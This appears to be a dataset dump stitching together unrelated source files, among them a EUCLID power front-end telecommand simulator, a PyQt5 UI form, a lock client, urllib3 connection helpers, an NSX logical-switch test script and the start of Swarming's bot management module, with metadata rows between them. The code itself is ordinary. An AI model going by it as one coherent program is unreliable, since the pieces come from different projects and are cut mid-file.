return False
elif tcFunctionId == FTH_ConfigNEA:
LOG_INFO("*** FTH_ConfigNEA ***", "SPACE")
pNEA_ID = tcPacketDu.getString(
FTH_ConfigNEA_NEA_ID_BYTE_OFFSET, FTH_ConfigNEA_NEA_ID_BYTE_SIZE).rstrip('\0')
pA_LO = tcPacketDu.getUnsigned(
FTH_ConfigNEA_A_LO_BYTE_OFFSET, FTH_ConfigNEA_A_LO_BYTE_SIZE)
pA_LO = UTIL.DU.unsigned2signed(pA_LO, FTH_ConfigNEA_A_LO_BYTE_SIZE) / 1000000.0
pA_HI_min = tcPacketDu.getUnsigned(
FTH_ConfigNEA_A_HI_min_BYTE_OFFSET, FTH_ConfigNEA_A_HI_min_BYTE_SIZE)
pA_HI_min = UTIL.DU.unsigned2signed(pA_HI_min, FTH_ConfigNEA_A_HI_min_BYTE_SIZE) / 1000000.0
pA_HI_max = tcPacketDu.getUnsigned(
FTH_ConfigNEA_A_HI_max_BYTE_OFFSET, FTH_ConfigNEA_A_HI_max_BYTE_SIZE)
pA_HI_max = UTIL.DU.unsigned2signed(pA_HI_max, FTH_ConfigNEA_A_HI_max_BYTE_SIZE) / 1000000.0
pA_Tmin = tcPacketDu.getUnsigned(
FTH_ConfigNEA_Tmin_BYTE_OFFSET, FTH_ConfigNEA_Tmin_BYTE_SIZE)
pA_Tmax = tcPacketDu.getUnsigned(
FTH_ConfigNEA_Tmax_BYTE_OFFSET, FTH_ConfigNEA_Tmax_BYTE_SIZE)
pNEA_TYPE = tcPacketDu.getString(
FTH_ConfigNEA_NEA_TYPE_BYTE_OFFSET, FTH_ConfigNEA_NEA_TYPE_BYTE_SIZE).rstrip('\0')
LOG_INFO("pNEA_ID = " + pNEA_ID, "SPACE")
LOG_INFO("pA_LO = " + str(pA_LO), "SPACE")
LOG_INFO("pA_HI_min = " + str(pA_HI_min), "SPACE")
LOG_INFO("pA_HI_max = " + str(pA_HI_max), "SPACE")
LOG_INFO("pA_Tmin = " + str(pA_Tmin), "SPACE")
LOG_INFO("pA_Tmax = " + str(pA_Tmax), "SPACE")
LOG_INFO("pNEA_TYPE = " + pNEA_TYPE, "SPACE")
neaMask = str(str(pA_LO) + "," + str(pA_HI_min) + "," + str(pA_HI_max) + "," + str(pA_Tmin) + ".0," + str(pA_Tmax) + ".0")
if pNEA_ID == "NEA1" and pNEA_TYPE == "N":
paramName = "NEA_MASK_1N"
elif pNEA_ID == "NEA1" and pNEA_TYPE == "R":
paramName = "NEA_MASK_1R"
elif pNEA_ID == "NEA2" and pNEA_TYPE == "N":
paramName = "NEA_MASK_2N"
elif pNEA_ID == "NEA2" and pNEA_TYPE == "R":
paramName = "NEA_MASK_2R"
elif pNEA_ID == "NEA3" and pNEA_TYPE == "N":
paramName = "NEA_MASK_3N"
elif pNEA_ID == "NEA3" and pNEA_TYPE == "R":
paramName = "NEA_MASK_3R"
else:
# unexpected NEA_Mask identifiers
LOG_WARNING("invalid NEA_ID " + pNEA_ID + " or NEA_TYPE " + pNEA_TYPE, "SPACE")
return False
return self.sendFTH_MonitorProUST_withStringParam(paramName, neaMask, FTH_NEA_Mask_BYTE_SIZE)
elif tcFunctionId == FTH_SelectNEA:
LOG_INFO("*** FTH_SelectNEA ***", "SPACE")
pNEA_ID = tcPacketDu.getString(
FTH_SelectNEA_NEA_ID_BYTE_OFFSET, FTH_SelectNEA_NEA_ID_BYTE_SIZE).rstrip('\0')
pNEA_TYPE = tcPacketDu.getString(
FTH_SelectNEA_NEA_TYPE_BYTE_OFFSET, FTH_SelectNEA_NEA_TYPE_BYTE_SIZE).rstrip('\0')
pSelect = tcPacketDu.getUnsigned(
FTH_SelectNEA_select_BYTE_OFFSET, FTH_SelectNEA_select_BYTE_SIZE)
LOG_INFO("pNEA_ID = " + pNEA_ID, "SPACE")
LOG_INFO("pNEA_TYPE = " + pNEA_TYPE, "SPACE")
LOG_INFO("pSelect = " + str(pSelect), "SPACE")
if pSelect == 1:
neaPulse = "0,0.0,0.0,None,Selected"
else:
neaPulse = "0,0.0,0.0,None,Unselected"
if pNEA_ID == "NEA1" and pNEA_TYPE == "N":
paramName = "NEA_PULSE_1N"
elif pNEA_ID == "NEA1" and pNEA_TYPE == "R":
paramName = "NEA_PULSE_1R"
elif pNEA_ID == "NEA2" and pNEA_TYPE == "N":
paramName = "NEA_PULSE_2N"
elif pNEA_ID == "NEA2" and pNEA_TYPE == "R":
paramName = "NEA_PULSE_2R"
elif pNEA_ID == "NEA3" and pNEA_TYPE == "N":
paramName = "NEA_PULSE_3N"
elif pNEA_ID == "NEA3" and pNEA_TYPE == "R":
paramName = "NEA_PULSE_3R"
else:
# unexpected NEA_Pulse identifiers
LOG_WARNING("invalid NEA_ID " + pNEA_ID + " or NEA_TYPE " + pNEA_TYPE, "SPACE")
return False
return self.sendFTH_MonitorProUST_withStringParam(paramName, neaPulse, FTH_NEA_Pulse_BYTE_SIZE)
else:
# unexpected Function ID
LOG_WARNING("no simulation for Function ID " + str(tcFunctionId) + " implemented", "SPACE")
return True
# ---------------------------------------------------------------------------
def sendFTH_MonitorProUST(self):
"""sends the FTH_MonitorProUST TM packet to CCS"""
pktMnemonic = "FTH_MonitorProUST"
params = EPWR_FTH_OP
values = self.operationMode
tmPacketData = SUPP.IF.s_definitions.getTMpacketInjectData(pktMnemonic,
params,
values)
# check the TM packet data
if tmPacketData == None:
LOG_ERROR("TM packet creation failed for " + pktMnemonic, "SPACE")
return False
# send the TM packet
return SPACE.IF.s_onboardComputer.generateTMpacket(tmPacketData)
# ---------------------------------------------------------------------------
def sendFTH_MonitorProUST_withStringParam(self, paramName, paramValue, paramSize):
"""sends the FTH_MonitorProUST TM packet to CCS"""
pktMnemonic = "FTH_MonitorProUST"
params = ""
values = ""
tmPacketData = SUPP.IF.s_definitions.getTMpacketInjectData(pktMnemonic,
params,
values)
# check the TM packet data
if tmPacketData == None:
LOG_ERROR("TM packet creation failed for " + pktMnemonic, "SPACE")
return False
# force the correct parameter size and add the parameter
paramValue = (paramValue + (' ' * paramSize))[0:paramSize]
tmPacketData.parameterValuesList.append([paramName,paramValue])
# send the TM packet
return SPACE.IF.s_onboardComputer.generateTMpacket(tmPacketData)
# =============================================================================
class EUCLIDpowerFEEsim_LPS_SAS(ApplicationSoftwareImpl):
"""Implementation of the EUCLID LPS/SAS Power Frontend Simulation"""
# ---------------------------------------------------------------------------
def __init__(self, isNominal):
"""Initialise attributes only"""
ApplicationSoftwareImpl.__init__(self)
self.isNominal = isNominal
self.commandingMode = EPWR_CMD_LOCAL
self.lpsOperationMode = EPWR_OP_OFFLINE
self.sasOperationMode = EPWR_OP_OFFLINE
self.scoeRunning = EPWR_SRUN_SAS
# ---------------------------------------------------------------------------
def processFunctionService(self, apid, tcFunctionId, tcPacketDu):
"""
processes PUS Service (8,1) telecommand packet
implementation of ApplicationSoftwareImpl.processFunctionService
"""
if tcFunctionId == LPS_Initialize:
LOG_INFO("*** LPS_Initialize ***", "SPACE")
LOG("set the SCOE into the LPSN running mode", "SPACE")
if self.isNominal:
self.scoeRunning = EPWR_SRUN_LPSN
else:
self.scoeRunning = EPWR_SRUN_LPSR
return self.sendLPS_Monitor()
elif tcFunctionId == LPS_SetLocal:
LOG_INFO("*** LPS_SetLocal ***", "SPACE")
LOG("set the SCOE into the LOCAL commanding mode", "SPACE")
self.commandingMode = EPWR_CMD_LOCAL
elif tcFunctionId == LPS_SetRemote:
LOG_INFO("*** LPS_SetRemote ***", "SPACE")
LOG("set the SCOE into the REMOTE commanding mode", "SPACE")
self.commandingMode = EPWR_CMD_REMOTE
elif tcFunctionId == LPS_LockInstruments:
LOG_INFO("*** LPS_LockInstruments ***", "SPACE")
LOG("not used for simulation", "SPACE")
elif tcFunctionId == LPS_UnlockInstruments:
LOG_INFO("*** LPS_UnlockInstruments ***", "SPACE")
LOG("not used for simulation", "SPACE")
elif tcFunctionId == LPS_SetOnLine:
LOG_INFO("*** LPS_SetOnLine ***", "SPACE")
LOG("set the SCOE into the ONLINE operation mode", "SPACE")
self.lpsOperationMode = EPWR_OP_ONLINE
return self.sendLPS_Monitor()
elif tcFunctionId == LPS_SetOffLine:
LOG_INFO("*** LPS_SetOffLine ***", "SPACE")
LOG("set the SCOE into the OFFLINE operation mode", "SPACE")
self.lpsOperationMode = EPWR_OP_OFFLINE
return self.sendLPS_Monitor()
elif tcFunctionId == LPS_SelfTest:
LOG_INFO("*** LPS_SelfTest ***", "SPACE")
elif tcFunctionId == SAS_Initialize:
LOG_INFO("*** SAS_Initialize ***", "SPACE")
LOG("set the SCOE into the SAS running mode", "SPACE")
self.scoeRunning = EPWR_SRUN_SAS
return self.sendLPS_Monitor()
elif tcFunctionId == SAS_SetLocal:
LOG_INFO("*** SAS_SetLocal ***", "SPACE")
self.commandingMode = EPWR_CMD_LOCAL
elif tcFunctionId == SAS_SetRemote:
LOG_INFO("*** SAS_SetRemote ***", "SPACE")
self.commandingMode = EPWR_CMD_REMOTE
elif tcFunctionId == SAS_LockInstruments:
LOG_INFO("*** SAS_LockInstruments ***", "SPACE")
LOG("not used for simulation", "SPACE")
elif tcFunctionId == SAS_UnlockInstruments:
LOG_INFO("*** SAS_UnlockInstruments ***", "SPACE")
LOG("not used for simulation", "SPACE")
elif tcFunctionId == SAS_SetOnline:
LOG_INFO("*** SAS_SetOnline ***", "SPACE")
LOG("set the SCOE into the OFFLINE operation mode", "SPACE")
self.sasOperationMode = EPWR_OP_ONLINE
return self.sendSAS_Monitor()
elif tcFunctionId == SAS_SetOffline:
LOG_INFO("*** SAS_SetOffline ***", "SPACE")
self.sasOperationMode = EPWR_OP_OFFLINE
return self.sendSAS_Monitor()
elif tcFunctionId == SAS_SelfTest:
LOG_INFO("*** SAS_SelfTest ***", "SPACE")
else:
# unexpected Function ID
LOG_WARNING("no simulation for Function ID " + str(tcFunctionId) + " implemented", "SPACE")
return True
# ---------------------------------------------------------------------------
def sendLPS_Monitor(self):
"""sends the LPS_Monitor TM packet to CCS"""
pktMnemonic = "LPS_Monitor"
params = EPWR_SRUN_PARAMS + "," + \
EPWR_LPS_OP_Section1P + "," + \
EPWR_LPS_OP_Section1S + "," + \
EPWR_LPS_OP_Section2P + "," + \
EPWR_LPS_OP_Section2S + "," + \
EPWR_LPS_OP_Section3P + "," + \
EPWR_LPS_OP_Section3S
values = self.scoeRunning + "," + \
self.lpsOperationMode + "," + \
self.lpsOperationMode + "," + \
self.lpsOperationMode + "," + \
self.lpsOperationMode + "," + \
self.lpsOperationMode + "," + \
self.lpsOperationMode
tmPacketData = SUPP.IF.s_definitions.getTMpacketInjectData(pktMnemonic,
params,
values)
# check the TM packet data
if tmPacketData == None:
LOG_ERROR("TM packet creation failed for " + pktMnemonic, "SPACE")
return False
# send the TM packet
return SPACE.IF.s_onboardComputer.generateTMpacket(tmPacketData)
# ---------------------------------------------------------------------------
def sendSAS_Monitor(self):
"""sends the SAS_Monitor TM packet to CCS"""
pktMnemonic = "SAS_Monitor"
params = EPWR_SAS_OP_Section1 + "," + \
EPWR_SAS_OP_Section2 + "," + \
EPWR_SAS_OP_Section3 + "," + \
EPWR_SAS_OP_Section4 + "," + \
EPWR_SAS_OP_Section5 + "," + \
EPWR_SAS_OP_Section6 + "," + \
EPWR_SAS_OP_Section7 + "," + \
EPWR_SAS_OP_Section8 + "," + \
EPWR_SAS_OP_Section9 + "," + \
EPWR_SAS_OP_Section10 + "," + \
EPWR_SAS_OP_Section11 + "," + \
EPWR_SAS_OP_Section12 + "," + \
EPWR_SAS_OP_Section13 + "," + \
EPWR_SAS_OP_Section14 + "," + \
EPWR_SAS_OP_Section15
values = self.sasOperationMode + "," + \
self.sasOperationMode + "," + \
self.sasOperationMode + "," + \
self.sasOperationMode + "," + \
self.sasOperationMode + "," + \
self.sasOperationMode + "," + \
self.sasOperationMode + "," + \
self.sasOperationMode + "," + \
self.sasOperationMode + "," + \
self.sasOperationMode + "," + \
self.sasOperationMode + "," + \
self.sasOperationMode + "," + \
self.sasOperationMode + "," + \
self.sasOperationMode + "," + \
self.sasOperationMode
tmPacketData = SUPP.IF.s_definitions.getTMpacketInjectData(pktMnemonic,
params,
values)
# check the TM packet data
if tmPacketData == None:
LOG_ERROR("TM packet creation failed for " + pktMnemonic, "SPACE")
return False
# send the TM packet
return SPACE.IF.s_onboardComputer.generateTMpacket(tmPacketData)
#############
# functions #
#############
def init():
"""initialise singleton(s)"""
mission = UTIL.SYS.s_configuration.ASW_MISSION
if mission == "MTG":
SPACE.IF.s_applicationSoftware = MTGapplicationSoftwareImpl()
elif mission == "S4":
SPACE.IF.s_applicationSoftware = S4applicationSoftwareImpl()
elif mission == "EUCLID_BS":
SPACE.IF.s_applicationSoftware = EUCLIDpowerFEEsim_BS()
elif mission == "EUCLID_FTH":
SPACE.IF.s_applicationSoftware = EUCLIDpowerFEEsim_FTH()
elif mission == "EUCLID_LPSN":
SPACE.IF.s_applicationSoftware = EUCLIDpowerFEEsim_LPS_SAS(True)
elif mission == "EUCLID_LPSR":
SPACE.IF.s_applicationSoftware = EUCLIDpowerFEEsim_LPS_SAS(False)
else:
SPACE.IF.s_applicationSoftware = ApplicationSoftwareImpl()
| mit | -8,097,726,725,551,173,000 | 43.964431 | 128 | 0.593242 | false | 3.422946 | true | false | false |
ric2b/confidential-debt-simplification | client/ui_pending.py | 1 | 5260 | # -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'pending.ui'
#
# Created by: PyQt5 UI code generator 5.7.1
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_PendingWidget(object):
def setupUi(self, PendingWidget):
PendingWidget.setObjectName("PendingWidget")
PendingWidget.resize(542, 297)
self.verticalLayout = QtWidgets.QVBoxLayout(PendingWidget)
self.verticalLayout.setObjectName("verticalLayout")
self.tab_widget = QtWidgets.QTabWidget(PendingWidget)
self.tab_widget.setObjectName("tab_widget")
self.loans_tab = QtWidgets.QWidget()
self.loans_tab.setObjectName("loans_tab")
self.verticalLayout_2 = QtWidgets.QVBoxLayout(self.loans_tab)
self.verticalLayout_2.setContentsMargins(0, 0, 0, 0)
self.verticalLayout_2.setObjectName("verticalLayout_2")
self.loans_table = QtWidgets.QTableWidget(self.loans_tab)
self.loans_table.setEditTriggers(QtWidgets.QAbstractItemView.NoEditTriggers)
self.loans_table.setObjectName("loans_table")
self.loans_table.setColumnCount(5)
self.loans_table.setRowCount(0)
item = QtWidgets.QTableWidgetItem()
self.loans_table.setHorizontalHeaderItem(0, item)
item = QtWidgets.QTableWidgetItem()
self.loans_table.setHorizontalHeaderItem(1, item)
item = QtWidgets.QTableWidgetItem()
self.loans_table.setHorizontalHeaderItem(2, item)
item = QtWidgets.QTableWidgetItem()
self.loans_table.setHorizontalHeaderItem(3, item)
item = QtWidgets.QTableWidgetItem()
self.loans_table.setHorizontalHeaderItem(4, item)
self.verticalLayout_2.addWidget(self.loans_table)
self.tab_widget.addTab(self.loans_tab, "")
self.debts_tab = QtWidgets.QWidget()
self.debts_tab.setObjectName("debts_tab")
self.verticalLayout_3 = QtWidgets.QVBoxLayout(self.debts_tab)
self.verticalLayout_3.setContentsMargins(0, 0, 0, 0)
self.verticalLayout_3.setObjectName("verticalLayout_3")
self.debts_table = QtWidgets.QTableWidget(self.debts_tab)
self.debts_table.setEditTriggers(QtWidgets.QAbstractItemView.NoEditTriggers)
self.debts_table.setObjectName("debts_table")
self.debts_table.setColumnCount(5)
self.debts_table.setRowCount(0)
item = QtWidgets.QTableWidgetItem()
self.debts_table.setHorizontalHeaderItem(0, item)
item = QtWidgets.QTableWidgetItem()
self.debts_table.setHorizontalHeaderItem(1, item)
item = QtWidgets.QTableWidgetItem()
self.debts_table.setHorizontalHeaderItem(2, item)
item = QtWidgets.QTableWidgetItem()
self.debts_table.setHorizontalHeaderItem(3, item)
item = QtWidgets.QTableWidgetItem()
self.debts_table.setHorizontalHeaderItem(4, item)
self.verticalLayout_3.addWidget(self.debts_table)
self.tab_widget.addTab(self.debts_tab, "")
self.verticalLayout.addWidget(self.tab_widget)
self.horizontalLayout = QtWidgets.QHBoxLayout()
self.horizontalLayout.setObjectName("horizontalLayout")
spacerItem = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
self.horizontalLayout.addItem(spacerItem)
self.refresh_button = QtWidgets.QPushButton(PendingWidget)
self.refresh_button.setObjectName("refresh_button")
self.horizontalLayout.addWidget(self.refresh_button)
self.verticalLayout.addLayout(self.horizontalLayout)
self.retranslateUi(PendingWidget)
self.tab_widget.setCurrentIndex(0)
self.refresh_button.clicked.connect(PendingWidget.refresh)
QtCore.QMetaObject.connectSlotsByName(PendingWidget)
def retranslateUi(self, PendingWidget):
_translate = QtCore.QCoreApplication.translate
PendingWidget.setWindowTitle(_translate("PendingWidget", "Form"))
item = self.loans_table.horizontalHeaderItem(1)
item.setText(_translate("PendingWidget", "UOMe ID"))
item = self.loans_table.horizontalHeaderItem(2)
item.setText(_translate("PendingWidget", "Borrower"))
item = self.loans_table.horizontalHeaderItem(3)
item.setText(_translate("PendingWidget", "Amount"))
item = self.loans_table.horizontalHeaderItem(4)
item.setText(_translate("PendingWidget", "Description"))
self.tab_widget.setTabText(self.tab_widget.indexOf(self.loans_tab), _translate("PendingWidget", "Loans"))
item = self.debts_table.horizontalHeaderItem(1)
item.setText(_translate("PendingWidget", "UOMe ID"))
item = self.debts_table.horizontalHeaderItem(2)
item.setText(_translate("PendingWidget", "Loaner"))
item = self.debts_table.horizontalHeaderItem(3)
item.setText(_translate("PendingWidget", "Amount"))
item = self.debts_table.horizontalHeaderItem(4)
item.setText(_translate("PendingWidget", "Description"))
self.tab_widget.setTabText(self.tab_widget.indexOf(self.debts_tab), _translate("PendingWidget", "Debts"))
self.refresh_button.setText(_translate("PendingWidget", "Refresh"))
| gpl-3.0 | 1,727,756,830,978,285,000 | 51.6 | 114 | 0.706274 | false | 3.856305 | false | false | false |
thefab/rdlm-py | rdlmpy/lock.py | 1 | 1695 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# This file is part of rdlm-py released under the MIT license.
# See the LICENSE file for more information.
import json
import datetime
from rdlmpy.exceptions import RDLMClientException
def iso8601_to_datetime(iso8601_string):
return datetime.datetime.strptime(iso8601_string[0:19], "%Y-%m-%dT%H:%M:%S")
class RDLMLock(object):
'''
Class which defines a lock object
'''
url = None
title = None
uid = None
lifetime = None
wait = None
active_since = None
active_expires = None
wait_since = None
wait_expires = None
def __init__(self, url):
self.url = url
@staticmethod
def factory(url, get_request_output):
res = None
try:
tmp = json.loads(get_request_output)
if tmp['active']:
res = RDLMActiveLock(url)
res.active_since = iso8601_to_datetime(tmp['active_since'])
res.active_expires = iso8601_to_datetime(tmp['active_expires'])
else:
res = RDLMWaitingLock(url)
res.wait_since = iso8601_to_datetime(tmp['wait_since'])
res.wait_expires = iso8601_to_datetime(tmp['wait_expires'])
res.title = tmp['title']
res.uid = tmp['uid']
res.lifetime = tmp['lifetime']
res.wait = tmp['wait']
except:
raise RDLMClientException("impossible to build the lock object")
return res
class RDLMActiveLock(RDLMLock):
@property
def active(self):
return True
class RDLMWaitingLock(RDLMLock):
@property
def active(self):
return False
| mit | 1,096,588,072,310,464,300 | 24.298507 | 80 | 0.59174 | false | 3.783482 | false | false | false |
benesch/pip | pip/_vendor/requests/packages/urllib3/util/connection.py | 365 | 4744 | from __future__ import absolute_import
import socket
try:
from select import poll, POLLIN
except ImportError: # `poll` doesn't exist on OSX and other platforms
poll = False
try:
from select import select
except ImportError: # `select` doesn't exist on AppEngine.
select = False
def is_connection_dropped(conn): # Platform-specific
"""
Returns True if the connection is dropped and should be closed.
:param conn:
:class:`httplib.HTTPConnection` object.
Note: For platforms like AppEngine, this will always return ``False`` to
let the platform handle connection recycling transparently for us.
"""
sock = getattr(conn, 'sock', False)
if sock is False: # Platform-specific: AppEngine
return False
if sock is None: # Connection already closed (such as by httplib).
return True
if not poll:
if not select: # Platform-specific: AppEngine
return False
try:
return select([sock], [], [], 0.0)[0]
except socket.error:
return True
# This version is better on platforms that support it.
p = poll()
p.register(sock, POLLIN)
for (fno, ev) in p.poll(0.0):
if fno == sock.fileno():
# Either data is buffered (bad), or the connection is dropped.
return True
# This function is copied from socket.py in the Python 2.7 standard
# library test suite. Added to its signature is only `socket_options`.
# One additional modification is that we avoid binding to IPv6 servers
# discovered in DNS if the system doesn't have IPv6 functionality.
def create_connection(address, timeout=socket._GLOBAL_DEFAULT_TIMEOUT,
source_address=None, socket_options=None):
"""Connect to *address* and return the socket object.
Convenience function. Connect to *address* (a 2-tuple ``(host,
port)``) and return the socket object. Passing the optional
*timeout* parameter will set the timeout on the socket instance
before attempting to connect. If no *timeout* is supplied, the
global default timeout setting returned by :func:`getdefaulttimeout`
is used. If *source_address* is set it must be a tuple of (host, port)
for the socket to bind as a source address before making the connection.
An host of '' or port 0 tells the OS to use the default.
"""
host, port = address
if host.startswith('['):
host = host.strip('[]')
err = None
# Using the value from allowed_gai_family() in the context of getaddrinfo lets
# us select whether to work with IPv4 DNS records, IPv6 records, or both.
# The original create_connection function always returns all records.
family = allowed_gai_family()
for res in socket.getaddrinfo(host, port, family, socket.SOCK_STREAM):
af, socktype, proto, canonname, sa = res
sock = None
try:
sock = socket.socket(af, socktype, proto)
# If provided, set socket level options before connecting.
_set_socket_options(sock, socket_options)
if timeout is not socket._GLOBAL_DEFAULT_TIMEOUT:
sock.settimeout(timeout)
if source_address:
sock.bind(source_address)
sock.connect(sa)
return sock
except socket.error as e:
err = e
if sock is not None:
sock.close()
sock = None
if err is not None:
raise err
raise socket.error("getaddrinfo returns an empty list")
def _set_socket_options(sock, options):
if options is None:
return
for opt in options:
sock.setsockopt(*opt)
def allowed_gai_family():
"""This function is designed to work in the context of
getaddrinfo, where family=socket.AF_UNSPEC is the default and
will perform a DNS search for both IPv6 and IPv4 records."""
family = socket.AF_INET
if HAS_IPV6:
family = socket.AF_UNSPEC
return family
def _has_ipv6(host):
""" Returns True if the system can bind an IPv6 address. """
sock = None
has_ipv6 = False
if socket.has_ipv6:
# has_ipv6 returns true if cPython was compiled with IPv6 support.
# It does not tell us if the system has IPv6 support enabled. To
# determine that we must bind to an IPv6 address.
# https://github.com/shazow/urllib3/pull/611
# https://bugs.python.org/issue658327
try:
sock = socket.socket(socket.AF_INET6)
sock.bind((host, 0))
has_ipv6 = True
except Exception:
pass
if sock:
sock.close()
return has_ipv6
HAS_IPV6 = _has_ipv6('::1')
| mit | 7,948,240,712,715,729,000 | 31.944444 | 82 | 0.636172 | false | 4.157756 | false | false | false |
vmware/nsxramlclient | tests/logicalswitch.py | 1 | 3893 | # coding=utf-8
#
# Copyright © 2015 VMware, Inc. All Rights Reserved.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
# documentation files (the "Software"), to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and
# to permit persons to whom the Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all copies or substantial portions
# of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED
# TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF
# CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
__author__ = 'yfauser'
from tests.config import *
from nsxramlclient.client import NsxClient
import time
TRANSPORT_ZONE = 'TZ1'
client_session = NsxClient(nsxraml_file, nsxmanager, nsx_username, nsx_password, debug=True)
# find the objectId of the Scope with the name of the Transport Zone
vdn_scopes = client_session.read('vdnScopes', 'read')['body']
vdn_scope_dict_list = [scope_dict for scope_dict in vdn_scopes['vdnScopes'].items()]
vdn_scope = [scope[1]['objectId'] for scope in vdn_scope_dict_list if scope[1]['name'] == TRANSPORT_ZONE][0]
# get a template dict for the lswitch create
lswitch_create_dict = client_session.extract_resource_body_example('logicalSwitches', 'create')
client_session.view_body_dict(lswitch_create_dict)
# fill the details for the new lswitch in the body dict
lswitch_create_dict['virtualWireCreateSpec']['controlPlaneMode'] = 'UNICAST_MODE'
lswitch_create_dict['virtualWireCreateSpec']['name'] = 'TestLogicalSwitch1'
lswitch_create_dict['virtualWireCreateSpec']['tenantId'] = 'Tenant1'
# create new lswitch
new_ls = client_session.create('logicalSwitches', uri_parameters={'scopeId': vdn_scope},
request_body_dict=lswitch_create_dict)
client_session.view_response(new_ls)
# list all logical switches
all_lswitches = client_session.read('logicalSwitchesGlobal')
client_session.view_response(all_lswitches)
# list all logical switches in transport Zone
tz_lswitches = client_session.read('logicalSwitches', uri_parameters={'scopeId': vdn_scope})
client_session.view_response(tz_lswitches)
# Read the properties of the new logical switch
new_ls_props = client_session.read('logicalSwitch', uri_parameters={'virtualWireID': new_ls['objectId']})
client_session.view_response(new_ls_props)
time.sleep(5)
# update the properties of the new logical switch (name)
updated_ls_dict = new_ls_props['body']
updated_ls_dict['virtualWire']['name'] = 'ThisIsANewName'
update_resp = client_session.update('logicalSwitch', uri_parameters={'virtualWireID': new_ls['objectId']},
request_body_dict=updated_ls_dict)
time.sleep(5)
# delete new logical created ealier
client_session.delete('logicalSwitch', uri_parameters={'virtualWireID': new_ls['objectId']})
#TODO: test moving a VM to the new logical switch
# move a VM to a logical switch
#vm_attach_body_dict = client_session.extract_resource_body_example('logicalSwitchVmAttach', 'read')
#client_session.view_body_dict(vm_attach_body_dict)
#vm_attach_body_dict['com.vmware.vshield.vsm.inventory.dto.VnicDto']['objectId'] = ''
#vm_attach_body_dict['com.vmware.vshield.vsm.inventory.dto.VnicDto']['portgroupId'] = new_ls['objectId']
#vm_attach_body_dict['com.vmware.vshield.vsm.inventory.dto.VnicDto']['vnicUuid'] = ''
| mit | 3,931,512,705,397,035,500 | 44.788235 | 115 | 0.753083 | false | 3.512635 | false | false | false |
ppuggioni/invivoinfer | invivoinfer/signalproc_functions.py | 1 | 1130 | from __future__ import division
import numpy as np
import scipy.signal as ssig
import math
import random
import matplotlib.pyplot as plt
import pdb
import nitime.algorithms as tsa
import nitime.utils as utils
# -------------------- Generate Inhomogeneous Poisson Process time events
def power_spectrum(trace,dt,windowl,overlap_perc=0.75,plot=0):
# using welch method
window_bin=nextpow2(windowl/dt)
overlap_bin=int(window_bin*overlap_perc)
f, Pxx_den = ssig.welch(trace,fs=1/dt,window='hanning',nperseg=window_bin,noverlap=overlap_bin, detrend='constant', scaling='density')
Pxx_den_std=Pxx_den*(window_bin/trace.size *11 / 9)**0.5
#pdb.set_trace()
if plot==1:
plt.semilogy(f, Pxx_den)
plt.semilogy(f,Pxx_den+Pxx_den_std,color='red')
plt.semilogy(f,Pxx_den-Pxx_den_std,color='red')
plt.ylim([0.5e-5, 1])
plt.xlim([0, 300])
plt.xlabel('frequency [Hz]')
plt.ylabel('PSD [V**2/Hz]')
plt.show()
return f,Pxx_den,Pxx_den_std
# ------------ USED HERE
def nextpow2(i):
n = 1
while n < i: n *= 2
return n
| apache-2.0 | 8,200,338,205,600,856,000 | 21.156863 | 138 | 0.630088 | false | 2.890026 | false | false | false |
luci/luci-py | appengine/swarming/server/bot_management.py | 2 | 34057 | # Copyright 2014 The LUCI Authors. All rights reserved.
# Use of this source code is governed under the Apache License, Version 2.0
# that can be found in the LICENSE file.
"""Swarming bot management, e.g. list of known bots and their state.
+-----------+
|BotRoot |
|id=<bot_id>|
+-----------+
|
+------+--------------+
| | |
| v v
| +-----------+ +-------+
| |BotSettings| |BotInfo|
| |id=settings| |id=info|
| +-----------+ +-------+
|
+------+-----------+----- ... ----+
| | | |
| v v v
| +--------+ +--------+ +--------+
| |BotEvent| |BotEvent| ... |BotEvent|
| |id=fffff| |if=ffffe| ... |id=00000|
| +--------+ +--------+ +--------+
|
+------+
| |
| v
| +-------------+
| |BotDimensions| task_queues.py
| |id=1 |
| +-------------+
|
+--------------- ... -----+
| |
v v
+-------------------+ +-------------------+
|BotTaskDimensions | ... |BotTaskDimensions | task_queues.py
|id=<dimension_hash>| ... |id=<dimension_hash>|
+-------------------+ +-------------------+
+--------Root---------+
|DimensionAggregation |
|id=<all or pool name>|
+---------------------+
- BotEvent is a monotonically inserted entity that is added for each event
happening for the bot.
- BotInfo is a 'dump-only' entity used for UI, it permits quickly show the
state of every bots in an single query. It is basically a cache of the last
BotEvent and additionally updated on poll. It doesn't need to be updated in a
transaction.
- BotSettings contains bot-specific settings. It must be updated in a
transaction and contains admin-provided settings, contrary to the other
entities which are generated from data provided by the bot itself.
"""
from collections import defaultdict
import datetime
import hashlib
import logging
from google.appengine import runtime
from google.appengine.api import datastore_errors
from google.appengine.api import memcache
from google.appengine.ext import ndb
from components import datastore_utils
from components import utils
from proto.api import swarming_pb2 # pylint: disable=no-name-in-module
from server import bq_state
from server import config
from server import task_pack
from server import task_queues
from server.constants import OR_DIM_SEP
# BotEvent entities are deleted when they are older than the cutoff.
_OLD_BOT_EVENTS_CUT_OFF = datetime.timedelta(days=4 * 7)
### Models.
# There is one BotRoot entity per bot id. Multiple bots could run on a single
# host, for example with multiple phones connected to a host. In this case, the
# id is specific to each device acting as a bot.
BotRoot = datastore_utils.get_versioned_root_model('BotRoot')
class _BotCommon(ndb.Model):
"""Common data between BotEvent and BotInfo.
Parent is BotRoot.
"""
